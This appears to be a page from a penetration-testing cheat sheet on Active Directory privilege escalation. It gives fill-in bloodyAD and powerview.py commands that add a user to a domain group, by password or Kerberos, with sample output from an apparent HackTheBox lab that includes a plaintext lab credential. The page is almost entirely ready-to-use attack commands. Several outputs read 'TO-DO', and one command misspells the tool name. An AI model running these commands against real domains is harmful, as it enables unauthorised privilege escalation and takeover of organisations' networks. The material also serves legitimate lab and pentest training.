Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Privesc #1: Add User to Group (From Linux)
1. Add User to Group
# With password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> --dc-ip <DC_IP> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# With Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> --dc-ip <DC_IP> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DORef: bloodyAD
1. Connect
# With password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && powerview 'rebound.htb/oorend:1GR8t@$$4u@dc01.rebound.htb'
Logging directory is set to /home/kali/.powerview/logs/dc01.rebound.htb
[2024-09-24 07:11:06] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV >
# With Kerberos
sudo ntpdate -s <DC> && sowerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -k --no-pass
Sample Output:
TO-DO2. Add User to Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
PV > Add-DomainGroupMember -Identity 'servicemgmt' -Members 'oorend'
[2024-09-24 07:13:17] User oorend successfully added to servicemgmt
# Check
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
PV > Get-DomainGroupMember -Identity 'servicemgmt'
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : ppaul
MemberDistinguishedName : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-1951
...[SNIP]...
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : oorend
MemberDistinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-7682
Ref: powerview.py